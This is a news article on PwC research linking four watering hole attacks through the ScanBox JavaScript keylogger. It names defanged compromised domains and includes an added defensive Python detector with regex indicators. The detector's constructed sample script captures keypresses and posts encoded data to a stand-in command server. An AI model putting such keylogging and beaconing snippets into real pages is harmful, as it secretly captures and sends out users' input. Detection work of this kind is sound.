Four Distinct Watering Hole Attacks Dropping ScanBox Keylogger

PwC has published research on four watering hole attacks likely carried out by different attackers, all connected by the ScanBox JavaScript-based reconnaissance tool.

The appearance of the ScanBox keylogging tool in August ushered in a new era of reconnaissance tools used in targeted attacks. No longer was a malware infection required to steal information from a victim of interest. Instead, attackers using watering hole attacks were loading malicious JavaScript onto a compromised website; that JavaScript, ScanBox, acted as a keylogger that captured everything a user typed on the infected watering hole website.

“ScanBox is particularly dangerous as it doesn’t require malware to be successfully deployed to disk in order to steal information – the keylogging functionality simply requires the JavaScript code to be executed by a web browser,” wrote Chris Doman and Tom Lancaster of PwC. Their report, published Monday, revealed four separate attacks, each carried out by different attackers, using ScanBox against varied targets.

ScanBox, reported by AlienVault Labs in August, is primarily a reconnaissance tool that, in addition to the keylogger, enumerates software installed on the system, including security software, Adobe Flash and Reader versions, Office version and Java versions. All of this system information is encrypted and sent via a backdoor connection to a command and control server.
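A defensive angle on the behaviours described above (keystroke capture, plugin and version enumeration, beaconing results to a command and control server): an added example, not code from PwC, AlienVault or ScanBox itself, of a heuristic triage script that flags page scripts in which those indicator families co-occur. The regular expressions, weights, threshold and sample snippets are all constructed for illustration, not published ScanBox signatures.

```python
import re

# Indicator families modelled on the behaviours attributed to ScanBox:
# keystroke capture, plugin/version fingerprinting and beaconing to a C2.
# Patterns, weights and the threshold are assumptions for this example.
INDICATORS = {
    "keylogging": (3, re.compile(
        r"\.onkey(press|down|up)\s*=|addEventListener\(\s*['\"]key(press|down|up)['\"]", re.I)),
    "fingerprinting": (2, re.compile(
        r"navigator\.plugins|ShockwaveFlash|AcroPDF|deployJava|navigator\.javaEnabled", re.I)),
    "beaconing": (2, re.compile(
        r"XMLHttpRequest|sendBeacon\(|new\s+Image\(\)|\.src\s*=\s*['\"]https?://", re.I)),
    "encoding": (1, re.compile(
        r"\bbtoa\(|encodeURIComponent\(|\bRC4\b|\.encrypt\(", re.I)),
}

def score_script(source):
    """Return (total score, sorted list of matched indicator families)."""
    hits = [name for name, (_, pat) in INDICATORS.items() if pat.search(source)]
    score = sum(INDICATORS[name][0] for name in hits)
    return score, sorted(hits)

def is_recon_like(source, threshold=6):
    """Flag a script only when several families co-occur.
    One family alone (a keyup handler on a search box, an analytics pixel) is
    ordinary web code; capture plus fingerprinting plus an outbound channel
    is the combination that warrants a closer look at the hosting page."""
    score, hits = score_script(source)
    return score >= threshold and "keylogging" in hits and "beaconing" in hits

# Constructed sample script bodies (not real ScanBox code) for a smoke test.
SAMPLES = {
    "search_box": """
        input.addEventListener('keyup', function () { results.filter(input.value); });
    """,
    "analytics": """
        var img = new Image(); img.src = 'https://metrics.example/p.gif?u=' + encodeURIComponent(location.href);
    """,
    "recon_like": """
        document.onkeypress = capture;
        var p = navigator.plugins; var f = 'ShockwaveFlash.ShockwaveFlash';
        var x = new XMLHttpRequest(); x.open('POST', 'http://c2.example/r'); x.send(btoa(buf));
    """,
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, score_script(body), "FLAG" if is_recon_like(body) else "ok")
```

In practice the same scoring can be run over scripts pulled from a web proxy or from periodic crawls of an organisation's own sites, which is where a watering hole compromise would first surface.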

“This is a very powerful framework that gives attackers a lot of insight into the potential targets that will help them launch future attacks against them,” wrote AlienVault Labs director Jaime Blasco.

PwC, meanwhile, took the ball and ran with it, identifying a number of other attacks where ScanBox has been deployed. All of the attacks relied on a watering hole to spread ScanBox. The targets, however, went beyond the industrial target uncovered by AlienVault in August. One month later, the code was used in China in attacks targeting Uyghur activists in a compromise of code[.]googlecaches[.]com, and again in two other attacks in October. The first was against a U.S. government think tank via a compromise of news[.]foundationssl[.]com, and the other against a hospitality site in South Korea, qoog1e[.]com.

“This variation was our first clue that more than one actor may be using the framework (although on its own this would not be enough – some actors do target a wide range of organisations, some also focus on specific geographies or sectors),” Doman and Lancaster wrote.

The PwC researchers said they noticed implementation differences in the same codebase, alerting them that different actors may be using the same code. There were differences in how the malicious code was delivered on two of the sites versus the other two. In two attacks, for example, the malware was delivered as a single block of code, while in the other two, it was delivered via plug-ins.

Analysis of the attackers’ respective infrastructure gave other clues that multiple groups had taken a liking to ScanBox. None of the four attacks used the same nameservers or malware families; the only visible overlap was that two of them used GoDaddy as a domain registrar.

“We have been unable to identify any direct overlaps between the clusters, i.e. shared domains or IP addresses, neither have we been able to determine any softer linkages beyond the reuse of the GoDaddy registrar,” the PwC report said.

PwC said that, as in other attacks, some threat actors share resources from centralized state-sponsored or criminal development teams, or exploit kits are outright stolen from public watering holes by other attack groups. Alternatively, the same group could be behind all four attacks, targeting widely and adapting its code for different targets, Doman and Lancaster said.

“In our view, the hypothesis with the highest probability is that groups of attackers share resources leading to overlaps – this appears to be an ever more common feature – with malware families, builders, and even sometimes hosting infrastructure being shared between disparate actors with a common goal,” Doman and Lancaster said. “Sharing frameworks like ScanBox or other exploit kits allows less sophisticated actors (who were themselves unable to develop a tool like ScanBox) to conduct better attacks.”
